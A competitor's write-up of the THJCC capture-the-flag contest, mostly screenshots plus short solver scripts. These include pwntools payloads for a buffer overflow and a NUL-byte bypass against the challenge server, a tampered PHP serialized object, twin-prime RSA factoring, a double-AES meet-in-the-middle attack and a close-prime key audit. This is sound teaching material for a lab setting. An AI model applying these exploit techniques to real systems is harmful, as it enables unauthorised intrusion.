# THJCC Write-Ups

Damn, the timing clashed badly this time. On the first day I was sitting at around 10th place. On the second day I had to work as a teaching assistant, so I had no choice but to sleep, and after four hours of sleep I woke up to find I had dropped to 20th. I barely held my rank on the train, but the beginners at the camp had almost no exposure to security, so I had to tutor them one-on-one and help them organize their notes, and then I fell apart. By the time I got home I was in the 30s, and I clawed my way back into the top 30 in the last two hours.

![screencapture-ctf-scint-org-user-2025-04-20-20_11_16](https://hackmd.io/_uploads/H1LK4wfJgx.png)
![screencapture-ctf-scint-org-scoreboard-2025-04-20-20_09_33](https://hackmd.io/_uploads/rJsjEvMJex.png)

## WarmUp

### Welcome

ctrl+c & ctrl+v

![image](https://hackmd.io/_uploads/SyZCOFxkgx.png)

### beep boop beep boop

![image](https://hackmd.io/_uploads/SJ7ZKtx1el.png)
![image](https://hackmd.io/_uploads/ByxzYFeJgg.png)

### Discord Challenge

![image](https://hackmd.io/_uploads/ByxW9Yeyxg.png)

## WEB

### Headless

![image](https://hackmd.io/_uploads/SyHzIlWylg.png)
![image](https://hackmd.io/_uploads/H1mjxlZyle.png)

### Nothing here

![image](https://hackmd.io/_uploads/ryKRLKl1gg.png)
![image](https://hackmd.io/_uploads/HJikPYlJlg.png)

### APPL3 STOR3

![image](https://hackmd.io/_uploads/Bk5WwKlylg.png)
![image](https://hackmd.io/_uploads/HyZSvYlylx.png)
![image](https://hackmd.io/_uploads/SyPPDFxJxg.png)

### Lime Ranger

```
a:2:{s:2:"UR";i:5;s:3:"SSR";i:5;}
```

![image](https://hackmd.io/_uploads/BklbSg-ygg.png)
![image](https://hackmd.io/_uploads/SJoHBeW1xl.png)

## PWN

### Flag Shopping

![image](https://hackmd.io/_uploads/HkxfUqTxklg.png)

### Money Overflow

```
from pwn import *

conn = remote('chal.ctf.scint.org', 10001)

# 20 filler bytes, then 65535 packed as a little-endian 16-bit value
payload = b'A' * 20 + p16(65535) + b"\n"
conn.sendlineafter(b'Enter your name: ', payload)
conn.interactive()
```

![image](https://hackmd.io/_uploads/ry4IQRlkgg.png)

### Insecure Shell

```
from pwn import *

io = remote("chal.ctf.scint.org", 10004)

# Send a single NUL byte as the input
io.sendline(b'\x00')
io.interactive()
```

![image](https://hackmd.io/_uploads/BylqTsbyll.png)

## MISC

### network noise

![image](https://hackmd.io/_uploads/ByobP0g1eg.png)

### Seems like someone’s breaking down

```
grep -Ei 'THJCC|base64|[a-zA-Z0-9+/=]{20,}' app.log
```

![image](https://hackmd.io/_uploads/BJN2w-G1ll.png)

## Crypto

### Twin

```
from Crypto.Util.number import inverse, long_to_bytes
from math import isqrt

N = 28265512785148668054687043164424479693022518403222612488086445701689124273153696780242227509530772578907204832839238806308349909883785833919803783017981782039457779890719524768882538916689390586069021017913449495843389734501636869534811161705302909526091341688003633952946690251723141803504236229676764434381120627728396492933432532477394686210236237307487092128430901017076078672141054391434391221235250617521040574175917928908260464932759768756492640542972712185979573153310617473732689834823878693765091574573705645787115368785993218863613417526550074647279387964173517578542035975778346299436470983976879797185599
e = 65537
C = 1234497647123308288391904075072934244007064896189041550178095227267495162612272877152882163571742252626259268589864910102423177510178752163223221459996160714504197888681222151502228992956903455786043319950053003932870663183361471018529120546317847198631213528937107950028181726193828290348098644533807726842037434372156999629613421312700151522193494400679327751356663646285177221717760901491000675090133898733612124353359435310509848314232331322850131928967606142771511767840453196223470254391920898879115092727661362178200356905669261193273062761808763579835188897788790062331610502780912517243068724827958000057923

# Twin primes: q = p + 2, so N + 1 = p*(p + 2) + 1 = (p + 1)^2
p = isqrt(1 + N) - 1
q = p + 2

phi = (p - 1) * (q - 1)
d = inverse(e, phi)
m = pow(C, d, N)
flag = long_to_bytes(m)
print(flag)
```

### Frequency Freakout

https://quipqiup.com

![image](https://hackmd.io/_uploads/HJxZBJZygg.png)

### snake

```
def decrypt_symbol_string(s):
    # Each symbol encodes one 4-bit value: its index in the table
    symbol_table = "!@#$%^&*(){}[]:;"
    bit_string = ""
    for c in s:
        idx = symbol_table.index(c)
        bit_string += f"{idx:04b}"
    # Regroup the bits into 8-bit characters
    chars = [chr(int(bit_string[i:i+8], 2)) for i in range(0, len(bit_string), 8)]
    return "".join(chars)

encrypted = input()
original = decrypt_symbol_string(encrypted)
print(original)
```

### DAES

```
from Crypto.Cipher import AES

test = b'you are my fire~'
out1 = bytes.fromhex(input())
out2 = bytes.fromhex(input())

def pad_key(i):
    return b'whalekey:' + str(i).encode()

# Step 1: try every possible key1 and store the intermediate ciphertext
enc1_dict = {}
for i in range(1000000, 2000000):
    key1 = pad_key(i)
    cipher = AES.new(key1, AES.MODE_ECB)
    mid = cipher.encrypt(test)
    enc1_dict[mid] = i

# Step 2: try every possible key2 and check whether decrypting out1
# lands on one of the intermediate values stored in step 1
for j in range(1000000, 2000000):
    key2 = pad_key(j)
    cipher = AES.new(key2, AES.MODE_ECB)
    try:
        mid = cipher.decrypt(out1)
    except ValueError:
        continue
    if mid in enc1_dict:
        key1_guess = pad_key(enc1_dict[mid])
        print(f"Found keys!\nkey1 = {key1_guess}\nkey2 = {key2}")
        break
else:
    raise SystemExit("no key pair found")

# Undo both layers on the second ciphertext
cipher1 = AES.new(key1_guess, AES.MODE_ECB)
cipher2 = AES.new(key2, AES.MODE_ECB)
mid = cipher2.decrypt(out2)
target = cipher1.decrypt(mid)
print(f"target = {target.hex()}")
```

## Reverse

### Python Hunter

```
d = [
    48, 39, 37, 49, 28, 16, 82, 17, 87, 13, 92, 71, 104, 52,
    21, 0, 83, 7, 95, 28, 55, 30, 11, 78, 87, 29, 18
]
k = 'door_key'

def qwe(abc, xyz):
    # Repeating-key XOR of the byte list with the key string
    r = []
    l = len(xyz)
    for i in range(len(abc)):
        t = chr(abc[i] ^ ord(xyz[i % l]))
        r.append(t)
    return ''.join(r)

flag = qwe(d, k)
print(f"flag{{{flag}}}")
```

### 西

```
encrypted = [
    0xa1, 0xbd, 0xbf, 0xb6, 0xb6, 0x8e, 0xa1, 0x9d, 0xc4, 0x86,
    0xaa, 0xc4, 0xa6, 0xaa, 0x9b, 0xc5, 0xa1, 0xaa, 0x9a, 0x97,
    0x93, 0xa0, 0xd1, 0x96, 0xb5, 0xa1, 0xc4, 0xba, 0x9b, 0x88
]

# Single-byte XOR with 0xF5
flag = ''.join(chr(b ^ 0xF5) for b in encrypted)
print(flag)
```

# Feedback

## Feedback

![image](https://hackmd.io/_uploads/HJbB4Qfyel.png)
![image](https://hackmd.io/_uploads/SJABVmM1lg.png)
![flag](https://hackmd.io/_uploads/B1KIV7MJlx.png)

https://ctf.scint.org/files/06e8ef9ce8cf27ca520432e3d10f9417/flag.png
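
Returning to the Twin challenge in the Crypto section: its modulus falls because the two primes differ by only 2, and the same weakness applies to any RSA key whose primes are close together. The following is an added example, not part of the original write-up: a key-audit check based on Fermat's method that generalizes the twin-prime case. The names `fermat_close_factor` and `audit_modulus` and the small sample moduli are constructed for illustration.

```python
from math import isqrt


def fermat_close_factor(n, max_steps=100_000):
    """Return (p, q) with p <= q if n = p*q has close factors, else None.

    Fermat's method walks a = ceil(sqrt(n)), a+1, ... until a*a - n is a
    perfect square b*b, giving n = (a - b) * (a + b). The step count grows
    with (q - p)**2 / sqrt(n), so it is only fast for nearly equal factors.
    """
    if n < 3 or n % 2 == 0:
        raise ValueError("expected an odd modulus greater than 2")
    a = isqrt(n)
    if a * a < n:
        a += 1
    for _ in range(max_steps):
        b2 = a * a - n
        b = isqrt(b2)
        if b * b == b2:
            # a - b == 1 is the trivial split 1 * n (n is prime): not a finding.
            return None if a - b == 1 else (a - b, a + b)
        a += 1
    return None


def audit_modulus(n, max_steps=100_000):
    """Report whether a modulus fails the close-prime check."""
    found = fermat_close_factor(n, max_steps)
    if found is None:
        return {"weak": False}
    p, q = found
    return {"weak": True, "p": p, "q": q, "gap": q - p}


# Constructed sample moduli (small on purpose; not values from the challenge).
TWIN = 1000000007 * 1000000009       # twin primes, the Twin pattern
NEAR = 101 * 199                     # close enough to fall in 9 steps
FAR = 1000003 * 2147483647           # well separated primes

if __name__ == "__main__":
    for name, n in (("TWIN", TWIN), ("NEAR", NEAR), ("FAR", FAR)):
        print(name, audit_modulus(n))
```

A result of `weak: False` only means the primes are not close within the step budget; it says nothing about other properties of the key.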